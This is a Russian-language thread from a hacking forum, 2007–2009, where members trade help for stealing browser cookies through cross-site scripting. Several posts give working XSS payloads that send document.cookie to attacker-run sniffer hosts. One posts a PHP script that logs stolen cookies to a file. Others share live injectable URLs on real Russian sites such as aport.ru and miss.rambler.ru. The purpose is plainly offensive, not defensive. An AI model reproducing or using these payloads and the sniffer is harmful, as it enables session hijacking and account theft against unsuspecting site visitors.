xSs как отправить кукисы на

Discussion in 'Песочница' started by Chakir, 16 Feb 2007.

  1. Chakir

    Chakir Elder - Старейшина

    Joined:
    17 Apr 2006
    Messages:
    34
    Likes Received:
    7
    Reputations:
    0
    пробую так!
    Code:
    ssss"><script>alert('xss')</script>
    всё ок выкибывает исправно!
    пробую так
    Code:
    ssss"><script>alert(document.cookie)</script>
    всё ок кидает куки!
    пробуё так
    Code:
    ssss"><script>img = new Image(); img.src = "http://www.klub.h10.ru/snif/s.php?"+document.cookie;</script>
    не канает!

    как отправить кукисы на http://www.klub.h10.ru/snif/s.php
     
    #1 Chakir, 16 Feb 2007
    1 person likes this.
  2. Robin_Hood

    Robin_Hood Elder - Старейшина

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    скорее всего стоит ограничение на длину строки
     
    #2 Robin_Hood, 16 Feb 2007
  3. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    Исходный код смотри - что в нем получается.
     
    #3 Abra, 16 Feb 2007
  4. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    попробуй так "><script src=http://site.com/js.js></script>

    в js.js - img=new Image();img.src="http://sniffer.ru/s.gif?"+document.cookie;
     
    #4 Dagon, 16 Feb 2007
  5. none222

    none222 Guest

    Reputations:
    0
    дай линк на сайт.
    очень часто нужно писать +escape(document.cookie);
     
    #5 none222, 16 Feb 2007
  6. ya_mag

    ya_mag Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    52
    Likes Received:
    8
    Reputations:
    10
    может и мне кто поможет? нашол вот такой xss
    <meta http-equiv=Refresh content=0;url=javascript:alert("OK")>
    пишеш
    <meta http-equiv=Refresh content=0;url=javascript:document.cookie> показывает куки...
    делаю ссылку на фаил js.js на снифер ничего не приходит :(
    ссылку делаю вот так
    <meta http-equiv=Refresh content=0;url=javascript:http://my_site/js.js>
    и вот так вот пробывал
    <meta http-equiv=Refresh content=0;url=javascript:new Image();img.src="http://my_site/s.gif?"+document.cookie;>
    может я неправильно ссылку ставлю?
     
    #6 ya_mag, 16 Feb 2007
    Last edited: 17 Feb 2007
  7. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    без javascript в url
    и на хтмл страницу со скриптом
     
    #7 GreenBear, 16 Feb 2007
    Last edited: 17 Feb 2007
  8. ya_mag

    ya_mag Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    52
    Likes Received:
    8
    Reputations:
    10
    без javascript просто открыват внутренность того чтонаписанно в js.js
     
    #8 ya_mag, 17 Feb 2007
    2 people like this.
  9. Chakir

    Chakir Elder - Старейшина

    Joined:
    17 Apr 2006
    Messages:
    34
    Likes Received:
    7
    Reputations:
    0
    народ вот xss на апорт.ру а как сделать чтобы она кукисы на http://www.klub.h10.ru/snif/s.php отсылала? логи смотреть тут http://www.klub.h10.ru/snif/log.php
    помогите кто поможет таму +
    кому помог я тот мне + =)
    Code:
    http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert%28%27XSS_by_Chakir%27%29%3C%2Fscript%3E
     
    #9 Chakir, 17 Feb 2007
  10. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    подскажте как провести xss, если все что идёт после "/" режется?
     
    #10 VampiRUS, 24 Feb 2007
  11. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    Попробуй заменить " на '
     
    #11 Sharky, 25 Feb 2007
  12. iSvt

    iSvt New Member

    Joined:
    19 Feb 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    у меня ребят вопрос нашел вот
    http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
    А как сделать чтобы куки пришли мне ведь ни один сниффер-то не пашет na-s.ru прикрыли
    может кто напишет сниф
     
    #12 iSvt, 19 Feb 2009
  13. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    http://kanick.ru/sniffer/
     
    #13 iddqd, 19 Feb 2009
  14. iSvt

    iSvt New Member

    Joined:
    19 Feb 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    смотрел но что-то не работает я паблик версию юзал
    может пример какой-то даст
     
    #14 iSvt, 19 Feb 2009
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    Вот .. создаешь файл i.php на своем хосте пишешь туда

    PHP:
    <?php
    if(isset($_GET[1])){
    $fp fopen("log.html""a+");
    fwrite($fp'<h1>'.date('H:i:s d F Y').'</h1>'."\r\n".'<textarea rows=40 cols=150>'.$_GET[1].'</textarea><br><br>' "\r\n");
    fclose($fp);
    }
    ?>
    там же создаешь файл log.html и права 777 ставишь...


    А юзать так

    PHP:
    <script>var d=documentd.write('<img width=0 src=http://evilxakersait.com/i.php?1='+escape(d.cookie)+'>')</script>
    http://evilxakersait.com твой сайт куда ты зальешь свой сниффер ...

    вот что то в этом роде
     
    #15 попугай, 19 Feb 2009
  16. Fepsis

    Fepsis Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    791
    Likes Received:
    391
    Reputations:
    72
    Юзаю вот этот снифер http://web-defence.ru/snif/
     
    #16 Fepsis, 19 Feb 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.